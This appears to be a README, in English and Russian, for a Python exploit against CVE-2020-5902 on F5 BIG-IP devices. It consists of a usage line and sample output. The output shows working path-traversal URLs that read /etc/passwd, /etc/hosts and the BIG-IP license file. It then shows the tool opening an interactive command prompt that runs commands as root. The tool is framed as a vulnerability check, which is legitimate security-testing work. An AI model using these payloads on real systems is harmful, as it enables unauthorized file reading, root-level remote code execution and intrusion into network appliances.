
Python script to check CVE-2020-5902 (F5 BIG-IP devices).
Python-скрипт для проверки CVE-2020-5902 (устройства F5 BIG-IP).
python3 CVE-2020-5902.py -i <IP>
- Python-скрипт для проверки CVE-2020-5902 (устройства F5 BIG-IP). | разработано Abdullah AlZahrani
[!] Ваша цель: 127.0.0.1
[I] /etc/passwd доступен для чтения
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
[I] /etc/hosts доступен для чтения
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
[I] /config/bigip.license доступен для чтения
[PoC] https://127.0.0.1/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
[I] Цель уязвима для CVE-2020-5902
[*] Проверка, уязвима ли цель для RCE
[#] Цель уязвима для RCE, погнали.
Command > id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0